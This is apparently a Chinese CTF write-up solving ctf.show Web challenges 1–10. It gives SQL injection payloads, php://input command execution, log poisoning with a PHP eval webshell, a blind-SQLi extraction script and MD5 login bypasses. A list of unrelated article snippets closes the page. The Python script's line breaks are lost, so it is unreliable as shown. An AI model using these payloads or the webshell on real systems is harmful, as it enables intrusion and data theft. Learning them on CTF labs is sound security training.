当前位置: 首页 > news >正文

ctf.show—Web(1-10)详细通关教程

Web1-签到题

1、按F12查看元素,发现有一段被注释的字符串

2、看起来并不像flag,格式类似于Base64编码

扔到Base64在线编码平台:Base64 编码/解码 - 锤子在线工具此工具是一个 Base64 编码或解码在线工具,实现把字符串转成 Base64 或者从 Base64 转成成字符串。https://www.toolhelper.cn/EncodeDecode/Base64

3、解码后成功拿到flag

Web2-最简单的SQL注入

考查点:

  • 基本的SQL注入

  • 多表联合查询

1、判断注入点

用户名输入以下payload, 使SQL恒成立, 密码不用输

a' or true #

页面正常显示, 并且展示了登录成功后的用户名

2、接下来, 在用户名输入以下payload, 使SQL恒不成立, 密码还是不用输

a' or false #

页面空显示, 原来显示用户名的地方, 现在为空了, 这是因为我们输入的参数拼接到SQL中执行时, 使SQL变得横不成立, SQL查询不到用户的信息, 自然会空显示

由以上结果可知, 用户可以通过参数来控制SQL语句的执行结果, 故而存在SQL注入漏洞, 并且注入点为单引号字符型注入, 由于页面中有显示位( SQL查询的结果会在页面的固定位置显示), 推荐使用联合注入

3、脱库

获取当前使用的数据库, 盲猜flag就在当前使用的数据库中, 用户名输入以下payload, 密码不用输

a' union select 1,database(),3 #

4、获取数据库web2中的表

a' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='web2'),3 #

5、获取表flag中的字段, 很明显flag就在flag表中

a' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='web2' and table_name='flag'),3 #

6、获取 flag

a' union select 1,(select flag from flag),3 #

Web3-php伪协议

1、php://input伪协议

php://input伪协议是文件包含漏洞的一种利用方式, 在url的参数中使用伪协议时, 会将POST请求体中的内容当做文件来执行, 如果POST请求体中包含代码, 则代码会被正常执行, 从而造成任意代码执行

2、打开后出现这样的页面

3、在url的参数中提交PHP伪协议

?url=php://input

4、使用代理工具( Burp Suite)抓包, 在POST请求体中输入需要执行的PHP代码, 执行系统命令:查看当前目录下的文件

<?php system('ls');?>

发现一个名称为ctf_go_go_go和index.php的文件夹

5、用代理工具( Burp Suite)拦截请求, 在POST请求体中传递需要执行的PHP代码

<?php system('cat ctf_go_go_go');?>

这里就已经得到flag了

6、也可以尝试查看index.php的内容

<?php system('cat index.php');?>

Web4-日志注入 文件包含

1、日志注入:

日志注入是文件包含漏洞的一种利用方式, web服务器的日志文件会保存网站的访问记录, 包括请求的源地址, 时间, 请求方式, User-Agent, Referer等HTTP请求头, 如果在这些请求头中插入代码, 则代码会被保存在web服务器的日志文件中, 当我们访问日志文件的时候, 文件中的代码则会被执行

本次用到了一个Nginx日志文件的默认路径:/var/log/nginx/access.log

2、首先, 访问一下web服务器的日志文件

( Nginx日志文件的默认位置是/var/log/nginx/access.log)

(Windows日志文件的默认位置是 C盘/Windows/system32/winevt/logs)

?url=/var/log/nginx/access.log

3、使用代理工具( Burp Suite)在请求头User-Agent的内容中插入后门

<?php eval($_POST['1']);?>

4、使用蚁剑链接

5、在www目录下发现flag.txt

6、成功拿到flag

Web5-MD5加密漏洞-0e绕过

1、MD5加密漏洞

md5()函数在加密时存在一些漏洞, 这主要是因为PHP在使用来比较字符串时, 如果字符串是以0e开头, 则会被当做科学计数法, 结果转换为0

比如web5中, 两个参数经过md5()函数加密后, 都是0e开头, 在参与PHP的比较时, 都会转换为0, 结果会变成0=0, 从而使比较成立

2、打开页面为

3、分析题中给出的源码 可知当两个参数v1和v2的md5值相同时可得到flag

  • $flag="":初始化一个空字符串,用于存储 flag。
    $v1=$_GET['v1']:从 URL 的 GET 参数中获取 v1 的值。
    $v2=$_GET['v2']:从 URL 的 GET 参数中获取 v2 的值。
    if(!ctype_alpha($v1)):检查 v1 是否全为字母,如果不是,输出 "v1 error" 并终止脚本。
    if(!is_numeric($v2)):检查 v2 是否全为数字,如果不是,输出 "v2 error" 并终止脚本。
    if(md5($v1)==md5($v2)):比较 v1 和 v2 的 MD5 哈希值是否相等,如果相等,输出 $flag(但 $flag 是空字符串,所以实际上不会显示任何内容)

4、需要我们构造一个纯字母和纯数字MD5相同的两个字符串

?v1=QNKCDZO&v2=240610708

5、成功拿到flag

MD5开头0e后边纯数字
62778807

6、md5()函数加密后以0e开头的值还有

QNKCDZO
240610708
byGcY
sonZ7y
aabg7XSs
aabC9RqS
s878926199a
s155964671a
s214587387a
s1091221200a

Web6-sql注入,采用/**/注释绕过

1、使用万能账号测试注入点

括号()绕过, 用户名输入以下payload, 密码不用输

a'or(true)#

注释/**/绕过

a'/**/or/**/true/**/#

页面有显示位( 查询出来的用户在页面的固定位置展示), 推荐使用联合注入

2、脱库

获取当前数据库, 盲猜 flag 就在当前使用的数据库中, 用户名输入以下payload, 密码不用输

a'union/**/select/**/1,database(),3#
#或
'/**/or/**/1=1/**/union/**/select/**/1,/**/database(),/**/3;#--

3、获取数据库中的表

a'union/**/select/**/1,(select(group_concat(table_name))from/**/information_schema.tables/**/where/**/table_schema='web2'),3#
#或
'/**/or/**/1=1/**/union/**/select/**/1,/**/(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='web2'),/**/3;#--

4、获取表中的字段

a'union/**/select/**/1,(select(group_concat(column_name))from/**/information_schema.columns/**/where/**/table_schema='web2'and/**/table_name='flag'),3#

5、获取 flag表中 flag字段

a'union/**/select/**/1,(select/**/flag/**/from/**/flag),3##或'/**/or/**/1=1/**/union/**/select/**/1,/**/(select/**/flag/**/from/**/flag),/**/3;#--

6、获取 user表中id字段

'/**/or/**/1=1/**/union/**/select/**/1,/**/(select/**/id/**/from/**/user),/**/3;#--

Web7-数值型注入

第七关也是一个SQL注入漏洞, 注入点是数值型注入, 页面有回显, 推荐使用联合注入, 源码中过滤了空格, 可以使用注释/**/ 或 括号() 来绕过

1、判断注入点

url地址栏中输入以下payload, 是SQL恒成立, 可以查询到所有文章内容, 由此可证明存在SQL注入

?id=-1/**/or/**/true

2、脱库,获取当前数据库, url中输入以下payload

/?id=-1/**/union/**/select/**/1,database(),3

3、获取数据库中的表

/?id=-1/**/union/**/select/**/1,(select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema="web7"),3

4、获取表中的字段

/?id=-1/**/union/**/select/**/1,(select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_schema="web7"/**/and/**/table_name="flag"),3

5、到这里就已经可以获取 flag了

/?id=-1/**/union/**/select/**/1,(select/**/flag/**/from/**/flag),3

6、我们也可以尝试查看user表中的字段

/?id=-1/**/union/**/select/**/1,(select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_schema="web7"/**/and/**/table_name="user"),3

7、查看user表中id字段

?id=-1/**/union/**/select/**/1,(select/**/id/**/from/**/user),3

8、查看user表中username字段

?id=-1/**/union/**/select/**/1,(select/**/username/**/from/**/user),3

9、查看user表中password字段

?id=-1/**/union/**/select/**/1,(select/**/password/**/from/**/user),3

10、剩下的page表大家也可以自己去玩

/?id=-1/**/union/**/select/**/1,(select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_schema="web7"/**/and/**/table_name="page"),3

Web8-SQL 注入

ctf.show WEB模块第8关是一个SQL 注入漏洞, 注入点是数值型, 注入类型推荐使用布尔盲注,此关卡过滤了空格,逗号,and,union等关键字,

过滤空格, 可以使用括号() 或者注释/**/ 绕过
过滤and, 可以使用or替代
过滤union, 可以用盲注替代联合注入
过滤逗号, 可以使用特殊语法绕过, 比如:substr(database(),1,1) 可以用substr(database() from 1 for 1)来代替

1、首先确定注入点, 输入以下payload使SQL恒成立

?id=-1/**/or/**/true

由于SQL恒成立, 数据库将查询出表中的所有内容, 并返回到前端展示

2、再输入一下payload 使SQL恒不成立

?id=-1/**/or/**/false

由于SQL恒不成立, 数据库查询不到任何数据, 从而导致页面空显示

3、由以上返回结果可知, 该页面存在SQL注入, 注入点为数值型注入

接下来进行脱库, 由于盲注脱库比较复杂, 此处我们构造Python脚本进行自动化脱库, 注意payload中的字符串不要换行, 否则可能会出问题

import requestsurl = 'http://53aab0c2-b451-4910-a1e0-f15fd9e64b2a.challenge.ctf.show:8080/index.php?id=-1/**/or/**/'
name = ''# 循环45次( 循环次数按照返回的字符串长度自定义)
for i in range(1, 45):# 获取当前使用的数据库# payload = 'ascii(substr(database()from/**/%d/**/for/**/1))=%d'# 获取当前数据库的所有表# payload = 'ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%d/**/for/**/1))=%d'# 获取flag表的字段# payload = 'ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%d/**/for/**/1))=%d'# 获取flag表的数据payload = 'ascii(substr((select/**/flag/**/from/**/flag)from/**/%d/**/for/**/1))=%d'count = 0print('正在获取第 %d 个字符' % i)# 截取SQL查询结果的每个字符, 并判断字符内容for j in range(31, 128):result = requests.get(url + payload % (i, j))if 'If' in result.text:name += chr(j)print('数据库名/表名/字段名/数据: %s' % name)break# 如果某个字符不存在,则停止程序count += 1if count >= (128 - 31):exit()

Web9

1、使用dirsearch扫描目录发现有robots.txt

访问后页面为

2、这里提示我们访问/index.phps去下载,那我们就去访问

3、得到了index.phps文件,记事本打开

4、分析源码

初始化和获取密码:

$flag = "";
$password = $_POST['password'];

$flag 被初始化为空字符串,可能用于后续存储一些信息(如调试或错误信息)。

从 POST 请求中获取用户输入的密码。

密码长度检查:

if(strlen($password) > 10) {die("password error");
}

    该条件检查用户输入的密码长度。如果密码长度超过 10 个字符,脚本将终止并返回 "password error" 的消息。这是一个基本的安全措施,用于防止过长的输入,可能是为了防止某些类型的攻击(如缓冲区溢出)。

    5、SQL 查询构造:

    $sql = "select * from user where username ='admin' and password ='" . md5($password, true) . "'";

      构建 SQL 查询,检查用户表中是否存在用户名为 'admin' 且密码为输入密码经过 md5 哈希处理后的记录。

      使用 md5($password, true) 进行哈希计算,第二个参数为 true 表示返回二进制格式的 MD5 字符串。注意,通常在数据库中存储 MD5 哈希值时,使用的是十六进制表示(即不传第二个参数),这可能导致在验证时出错。

      执行 SQL 查询:

      $result = mysqli_query($con, $sql);

        执行 SQL 查询,查询结果存储在 $result 变量中。

        结果检查:

        if(mysqli_num_rows($result) > 0) {while($row = mysqli_fetch_assoc($result)) {echo "登陆成功<br>";echo $flag;}
        }

          检查查询结果的行数。如果返回的行数大于 0,则表示用户名和密码匹配成功。

          进入循环,取出查询的每一行(虽然在这个例子中,用户名应该是唯一的,所以只会有一行),并输出 "登陆成功"$flag 的值(此时 $flag 仍为空)。

          这里输入的值将会进行md5加密,再通过Hex转为字符串,需要让我们把这个字符串组成sql语句切返回行数大于0

          6、这里用到一个很奇妙的字符串 ffifdyop

          MD5加密后是 276f722736c95d99e921722cf9ed621c

          对应Hex为 'or'6É]é!r,ùíb

          将ffifdyop输入后,也是成功拿到了flag

          Web10

          1、进入页面

          2、用Ctrl+u查看源码,或者在url前加上view-source: 查看源码


          3、F12查看元素发现有个 style.css

          4、直接点击或在url后加上/style.css

          5、这里我们发现有个index.phps,我们也是直接访问

          6、得到源码

          从源码中可以得知几乎把注入用到的关键词过滤的差不多了,而且双写也被限制了

          7、这里介绍两个mysql语句

          ①group by(将结果集中的数据行根据选择列的值进行逻辑分组)

          ②with rollup (group by 后可以跟with rollup,表示在进行分组统计的基础上再次进行汇总统计)

          结果中将会多出一行,其中password列为null,count(*)为统计和。

          其中/**/是为了绕过空格过滤

          8、payload:

          username=admin'/**/or/**/1=1/**/group/**/by/**/password/**/with/**/rollup#&password=

          因为加入with rollup后 password有一行为NULL,我们只要输入空密码使得(NULL==NULL)即可满足$password==$row['password']的限制成功登陆。

          9、登录成功即可显示flag。

          相关文章:

          ctf.show—Web(1-10)详细通关教程

          Web1-签到题 1、按F12查看元素&#xff0c;发现有一段被注释的字符串 2、看起来并不像flag&#xff0c;格式类似于Base64编码 扔到Base64在线编码平台&#xff1a;Base64 编码/解码 - 锤子在线工具此工具是一个 Base64 编码或解码在线工具&#xff0c;实现把字符串转成 Base6…...

          双层Key缓存

          双层 Key 缓存是一种针对 缓存击穿 和 雪崩问题 的优化方案&#xff0c;其核心思想是通过 主备双缓存 的机制&#xff0c;确保在热点数据过期时仍能提供可用服务&#xff0c;同时降低对数据库的瞬时压力。以下是其核心原理、实现细节及适用场景的深度解析&#xff1a; 一、核心…...

          android编译使用共享缓存

          注意 服务器端与客户端系统的版本号需为Ubuntu20.04ccache版本不能低于4.4执行用户需要为sudo权限服务器端nfs目录权限必须为nobody:nogroup 一、服务端配置&#xff1a; 在服务器192.168.60.142上配置 NFS 共享 1.安装 NFS 服务器&#xff1a; 1 sudo apt-get install nfs…...

          如何使用Labelimg查看已经标注好的YOLO数据集标注情况

          文章目录 1、 安装并运行Labelimg1.1、安装Labelimg1.2、运行Labelimg 2、查看数据集标注情况2.1、创建类别名称文件classes.txt2.2、使用Labelimg打开查看标注文件2.3、正式标注 3、目标检测系列文章 本文主要介绍一下如何使用LabelImg查看已经标注好的YOLO数据集标注情况&…...

          Web3架构下的数据隐私与保护

          在这个信息爆炸的时代&#xff0c;Web3的概念如同一股清流&#xff0c;以其去中心化的特性&#xff0c;为数据隐私与保护带来了新的希望。Web3&#xff0c;也被称作下一代互联网&#xff0c;它通过区块链技术实现数据的去中心化存储和处理&#xff0c;旨在提高数据的安全性和隐…...

          PCM 参数深度解析:采样率、帧、缓存大小与多通道关系

          将下面的 PCM 配置作为例子&#xff1a; config.channels 2; // 立体声&#xff08;2 个通道&#xff09; config.rate 48000; // 采样率 48000 Hz&#xff0c;即每秒 48000 帧 config.period_size 1024; // 每个周…...

          Kafka消费者端重平衡流程

          重平衡的完整流程需要消费者 端和协调者组件共同参与才能完成。我们先从消费者的视角来审视一下重平衡的流程。在消费者端&#xff0c;重平衡分为两个步骤&#xff1a;分别是加入组和等待领导者消费者&#xff08;Leader Consumer&#xff09;分配方案。这两个步骤分别对应两类…...

          【字节跳动AI论文】海姆达尔:生成验证的测试时间扩展

          摘要&#xff1a;人工智能系统只能在能够验证知识本身的范围内创建和维护知识。 最近关于长链推理的研究表明&#xff0c;LLM在解决竞争问题方面具有巨大的潜力&#xff0c;但它们的验证能力仍然很弱&#xff0c;而且没有得到充分的研究。 在本文中&#xff0c;我们提出了Heimd…...

          【Datawhale Al春训营】气象预测(AI+航空安全)竞赛笔记

          这里写自定义目录标题 欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题&#xff0c;有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants 创建一个自定义列表如何创建一个…...

          大模型应用开发实战:AI Agent与智能体开发技术解析

          更多AI大模型应用开发学习内容&#xff0c;尽在聚客AI学院 一、AI Agent的核心概念 AI Agent&#xff08;智能体&#xff09;是基于大模型构建的自主任务执行系统&#xff0c;能够根据用户指令拆解目标、调用工具、完成复杂任务&#xff08;如数据分析、自动化办公&#xff09…...

          《Learning Langchain》阅读笔记3-基于 Gemini 的 Langchain如何从LLMs中获取特定格式

          纯文本输出是有用的&#xff0c;但在某些情况下&#xff0c;我们需要 LLM 生成结构化输出&#xff0c;即以机器可读格式&#xff08;如 JSON、XML 或 CSV&#xff09;或甚至以编程语言&#xff08;如 Python 或 JavaScript&#xff09;生成的输出。当我们打算将该输出传递给其他…...

          Mac mini 安装mysql数据库以及出现的一些问题的解决方案

          首先先去官网安装一下mysql数据库&#xff0c;基本上都是傻瓜式安装的流程&#xff0c;我也就不详细说了。 接下来就是最新版的mysql安装的时候&#xff0c;他就会直接让你设置一个新的密码。 打开设置&#xff0c;拉到最下面就会看到一个mysql的图标&#xff1a; 我设置的就是…...

          智能体时代的产业范式确立,中国企业以探索者姿态走出自己的路

          作者 | 曾响铃 文 | 响铃说 当前&#xff0c;一个新的20年的产业升级期已经开启&#xff0c;系统性的发展路径也正在形成。 前不久&#xff0c;以“共建智能体时代“为主题的超聚变探索者大会2025在河南郑州举办。超聚变变数字技术有限公司&#xff08;以下简称&#xff1a;…...

          电路安全智控系统与主机安全防护系统主要功能是什么

          电路安全智控系统被称为电路安全用电控制系统。电路安全智控系统具备一系列强大且实用的功能。电路安全智控系统能够对总电压、总电流、总功率、总电能&#xff0c;以及各分路的电压、电流、功率、电能和功率因素等进行全方位的监控。在大型工厂的电力分配中&#xff0c;通过对…...

          MCP Server驱动传统SaaS智能化转型:从工具堆叠到AI Agent生态重构,基于2025年技术演进与产业实践

          MCP Server驱动传统SaaS智能化转型&#xff1a;从工具堆叠到AI Agent生态重构 &#xff08;基于2025年技术演进与产业实践&#xff09; MCP模型上下文协议 一、技术底座革新&#xff1a;MCP协议重构AI时代的"数字接口" 传统SaaS软件向大模型AI应用转型的核心矛盾…...

          【工具变量】地市农业播种面积及粮食产量等21个相关指标(2013-2022年)

          粮食产量、粮食播种面积及农作物播种面积等&#xff0c;是衡量农业发展水平和粮食安全的重要指标。随着全球粮食需求的持续增长&#xff0c;准确掌握这些数据对制定农业政策、优化生产结构和提高农业生产效率至关重要。因此&#xff0c;缤本次分享数据包括《中国统计NJ》、《中…...

          使用 PySpark 批量清理 Hive 表历史分区

          使用 PySpark 批量清理 Hive 表历史分区 在大数据平台中&#xff0c;Hive 表通常采用分区方式存储数据&#xff0c;以提升查询效率和数据管理的灵活性。随着数据的不断积累&#xff0c;历史分区会越来越多&#xff0c;既占用存储空间&#xff0c;也影响元数据管理性能。因此&a…...

          A. k-th equality(1700)

          Problem - 1835A - Codeforces Daily_CF_Problems/daily_problems/2025/04/0417/solution/cf1835a.md at main Yawn-Sean/Daily_CF_Problems 考虑所有形式为 abc 的等式&#xff0c;其中 a有 A 位数&#xff0c; b 有 B 位数&#xff0c; c 有 C 位数。所有数字都是正整数,求…...

          深度学习-torch,全连接神经网路

          3. 数据集加载案例 通过一些数据集的加载案例&#xff0c;真正了解数据类及数据加载器。 3.1 加载csv数据集 代码参考如下 import torch from torch.utils.data import Dataset, DataLoader import pandas as pd ​ ​ class MyCsvDataset(Dataset):def __init__(self, fil…...

          echarts饼图中心呈现一张图片,并且能动态旋转的效果react组件

          实现效果&#xff1a; 父组件&#xff1a; import React from react import styles from ./style.less import GaugeChart from ./GaugeChart;export default function index() {return (<div><div className{styles.bg} ></div><div style{{ width: 500…...

          使用Docker搭建开源Email服务器

          使用Docker搭建开源Email服务器 1 介绍 开源的Email服务器比较多&#xff0c;例如&#xff1a;poste.io、MailCatcher、Postal、mailcow等。由于poste.io支持docker安装&#xff0c;页面比较美观&#xff0c;使用简单&#xff0c;支持SMTP IMAP POP3等协议&#xff0c;安全…...

          css图片设为灰色

          使用filter方式将图片设置为灰色 普通图片使用&#xff1a;filter: saturate(0); 纯白图片使用&#xff1a; <!DOCTYPE html> <html lang"en"><head><meta charset"UTF-8"><meta name"viewport" content"width…...

          2025 年第十五届 MathorCup竞赛赛题浅析-助攻快速选题

          本届妈杯竞赛各赛题难度均已经达到了国赛难度&#xff0c;也更好的回应了大家更为关心的&#xff0c;在当前AI环境下&#xff0c;似乎“数学建模变成了AI使用竞赛一样”。但是国委会一直以来都是一个态度&#xff1a;AI现在是无法直接解决任何一个国赛赛题的。对应的如今这句话…...

          【android bluetooth 案例分析 03】【PTS 测试 1】【pts基本介绍】

          Bluetooth SIG&#xff08;Special Interest Group&#xff09;提供的 PTS&#xff08;Profile Tuning Suite&#xff09;测试 是蓝牙认证过程中一项极为关键的步骤。它主要用于验证设备是否符合 Bluetooth SIG 制定的各项 蓝牙规范&#xff08;Bluetooth Specification&#x…...

          Java集合框架深度解析:HashMap、HashSet、TreeMap、TreeSet与哈希表原理详解

          一、核心数据结构总览 1. 核心类继承体系 graph TDMap接口 --> HashMapMap接口 --> TreeMapSet接口 --> HashSetSet接口 --> TreeSetHashMap --> LinkedHashMapHashSet --> LinkedHashSetTreeMap --> NavigableMapTreeSet --> NavigableSet 2. 核心…...

          【深度学习】张量计算:爱因斯坦求和约定|tensor系列03

          博主简介&#xff1a;努力学习的22级计算机科学与技术本科生一枚&#x1f338;博主主页&#xff1a; Yaoyao2024往期回顾&#xff1a;【深度学习】详解矩阵乘法、点积&#xff0c;内积&#xff0c;外积、哈达玛积极其应用|tensor系列02每日一言&#x1f33c;: “岱宗夫如何&…...

          OpenHarmony-Risc-V上运行openBLAS中的benchmark

          OpenHarmony-Risc-V上运行openBLAS中的benchmark 文章目录 OpenHarmony-Risc-V上运行openBLAS中的benchmark前言一、编译openBLAS1.源码下载2.工具链下载3.编译并安装openBLAS 二、编译open BLAS中的benchmark三、上设备运行总结 前言 参考https://zhuanlan.zhihu.com/p/18825…...

          CCF CSP 第36次(2024.12)(2_梦境巡查_C++)

          CCF CSP 第36次&#xff08;2024.12&#xff09;&#xff08;2_梦境巡查_C&#xff09; 解题思路&#xff1a;思路一&#xff1a; 代码实现代码实现&#xff08;思路一&#xff09;&#xff1a; 时间限制&#xff1a; 1.0 秒 空间限制&#xff1a; 512 MiB 原题链接 解题思路…...

          windows下安装mcp servers

          以sequential-thinking为例 macos下安装就像github readme中那样安装即可&#xff1a; {"mcpServers": {"sequential-thinking": {"command": "npx","args": ["-y","modelcontextprotocol/server-sequenti…...

          OpenGauss 数据库介绍

          OpenGauss 数据库介绍 OpenGauss 是华为基于 PostgreSQL 开发的企业级开源关系型数据库&#xff0c;现已成为开放原子开源基金会的项目。以下是 OpenGauss 的详细介绍&#xff1a; 一 核心特性 1.1 架构设计亮点 特性说明优势多核并行NUMA感知架构充分利用现代CPU多核性能行…...

          Web3区块链网络中数据隐私安全性探讨

          在这个信息爆炸的时代&#xff0c;Web3 的概念如同一股清流&#xff0c;以其去中心化、透明性和安全性的特点&#xff0c;为数据隐私保护提供了新的解决方案。本文将探讨 Web3 区块链网络中数据隐私的安全性问题&#xff0c;并探索如何通过技术手段提高数据隐私的保护。 Web3 …...

          linux驱动之poll

          驱动中 poll 实现 在用户空间实现事件操作的一个主要实现是调用 select/poll/epoll 函数。那么在驱动中怎么来实现 poll 的底层呢&#xff1f; 其实在内核的 struct file_operations 结构体中有一个 poll 成员&#xff0c;其就是底层实现的接口函数。 驱动中 poll 函数实现原…...

          【最后203篇系列】028 FastAPI的后台任务处理

          说明 今天偶然在别的文章里看到这个功能&#xff0c;突然觉得正好。 CeleryWorker已经搭好了&#xff0c;但是我一直想在用户请求时进行额外的处理会比较影响处理时间&#xff0c;用这个正好可以搭配上。 我设想的一个场景&#xff1a; 1 用户发起请求2 接口中进行关键信息…...

          微信小程序中,将搜索组件获取的值传递给父页面(如 index 页面)可以通过 自定义事件 或 页面引用 实现

          将搜索组件获取的值传递给父页面&#xff08;如 index 页面&#xff09;可以通过 自定义事件 或 页面引用 实现 方法 1&#xff1a;自定义事件&#xff08;推荐&#xff09; 步骤 1&#xff1a;搜索组件内触发事件 在搜索组件的 JS 中&#xff0c;当获取到搜索值时&#xff0c…...

          深入理解分布式缓存 以及Redis 实现缓存更新通知方案

          一、分布式缓存简介 1. 什么是分布式缓存 分布式缓存&#xff1a;指将应用系统和缓存组件进行分离的缓存机制&#xff0c;这样多个应用系统就可以共享一套缓存数据了&#xff0c;它的特点是共享缓存服务和可集群部署&#xff0c;为缓存系统提供了高可用的运行环境&#xff0c…...

          C#核心笔记——(六)框架基础

          我们在编程时所需的许多核心功能并不是由C#语言提供的,而是由.NET Framework中的类型提供的。本节我们将介绍Framework在基础编程任务(例如虚的等值比较、顺序比较以及类型转换)中的作用。我们还会介绍Framework中的基本类型,例如String、DateTime和Enum. 本章中的绝大部分…...

          C# 点击导入,将需要的参数传递到弹窗的页面

          点击导入按钮&#xff0c;获取本页面的datagridview标题的结构&#xff0c;并传递到导入界面。 新增一个datatable用于存储datagridview的caption和name&#xff0c;这里用的是devexpress组件中的gridview。 DataTable dt new DataTable(); DataColumn CAPTION …...

          java面向对象编程【基础篇】之基础概念

          目录 &#x1f680;前言&#x1f914;面向过程VS面向对象&#x1f4af;面向过程编程&#xff08;POP&#xff09;&#x1f4af;面向对象编程&#xff08;OOP&#xff09;&#x1f4af;两者对比 &#x1f31f;三大特性&#x1f4af;封装性&#x1f4af;继承性&#x1f4af;多态性…...

          Oceanbase单机版上手示例

          本月初Oceanbase单机版发布&#xff0c;作为一个以分布式起家的数据库&#xff0c;原来一个集群动辄小十台机器&#xff0c;多着十几台几十台甚至更多&#xff0c;Oceanbase单机版的发布确实大大降低了硬件部署的门槛。 1.下载安装介质 https://www.oceanbase.com/softwarece…...

          深度学习基础--CNN经典网络之InceptionV3详解与复现(pytorch)

          &#x1f368; 本文为&#x1f517;365天深度学习训练营 中的学习记录博客&#x1f356; 原作者&#xff1a;K同学啊 前言 InceptionV3是InceptionV1的升级版&#xff0c;虽然加大了计算量&#xff0c;但是当时效果是比VGG效果要好的。本次任务是探究InceptionV3结构并进行复…...

          VOIP通信中的错误码

          cancle报文 Reason: SIP;cause200;text"Call completed elsewhere" Reason: Q.850;cause26表示取消的原因是呼叫在其他地方已经完成表示Q.850标准中的原因码26&#xff0c;通常对应于“呼叫被取消”&#xff08;Call Cancelled&#xff09;487 Request Terminated Re…...

          C++ STL编程-vector概念、对象创建

          vector 概念&#xff1a;是常见的一种容器&#xff0c;被称为“柔性数组”。 在vector中&#xff0c;front()是数组中的第一个元素&#xff0c;back()是数组的最后一个元素。begin()是是指向第一个元素&#xff0c;end()是指向back()的后一个元素 vector的对象创建&#xff0…...

          easyexcel使用模板填充excel坑点总结

          1.单层map设置值是{属性}&#xff0c;那使用两层map进行设置值&#xff0c;是不是可以使用{属性.属性}&#xff0c;以为取出map里字段只用{属性}就可以设置值&#xff0c;那再加个.就可以从里边map取出对应属性&#xff0c;没有两层map写法 填充得到的文件打开报错 was empty (…...

          C#学习第16天:聊聊反射

          什么是反射&#xff1f; 定义&#xff1a;反射是一种机制&#xff0c;允许程序在运行时获取关于自身的信息&#xff0c;并且可以动态调用方法、访问属性或创建实例。用途&#xff1a;常用于框架设计、工具开发、序列化、代码分析和测试等场景 反射的核心概念 1. 获取类型信息…...

          【Unity】使用Cinemachine+CharacterController实现第三人称视角下的角色视角、移动和跳跃控制

          1.初始配置 安装Cinemachine插件给角色添加CharacterConroller创建Cinemachine-->Free Look Camera在Free Look Camera中调整参数&#xff0c;Y Axis勾选Inver&#xff0c;X Axis取消勾选InverFree Look Camera要看向角色 跟随角色&#xff08;自行设置&#xff0c;我就不…...

          如何通俗的理解transformer架构编码器和解码器干的活

          我们可以用生活中的比喻来理解Transformer的编码器和解码器&#xff0c;以及解码器中两种注意力的作用&#xff1a; 一、编码器&#xff08;Encoder&#xff09;&#xff1a;理解信息的「分析师团队」 想象你要翻译一句话&#xff0c;比如把中文“今天天气很好”翻译成英文。编…...

          React 受控表单绑定基础

          React 中最常见的几个需求是&#xff1a; 渲染一组列表绑定点击事件表单数据与组件状态之间的绑定 受控表单绑定是理解表单交互的关键之一。 &#x1f4cd;什么是受控组件&#xff1f; 在 React 中&#xff0c;所谓“受控组件”&#xff0c;指的是表单元素&#xff08;如 &l…...

          UMG:ListView

          1.创建WEB_ListView,添加Border和ListView。 2.创建Object,命名为Item(数据载体&#xff0c;可以是其他类型)。新增变量name。 3.创建User Widget&#xff0c;命名为Entry(循环使用的UI载体).添加Border和Text。 4.设置Entry继承UserObjectListEntry接口。 5.Entry中对象生成时…...

          实验五 内存管理实验

          实验五 内存管理实验 一、实验目的 1、了解操作系统动态分区存储管理过程和方法。 2、掌握动态分区存储管理的主要数据结构--空闲表区。 3、加深理解动态分区存储管理中内存的分配和回收。 4、掌握空闲区表中空闲区3种不同放置策略的基本思想和实现过程。 5、通过模拟程…...

          初识 Firebase 与 FPM

          Firebase 是什么 ? Firebase 是 Google 旗下面向 iOS、Android、Web 与多端框架&#xff08;Flutter、Unity 等&#xff09;的应用开发平台&#xff0c;提供从「构建 → 发布与运维 → 增长」全生命周期的一站式后端即服务&#xff08;BaaS&#xff09;。它把实时数据库、托管…...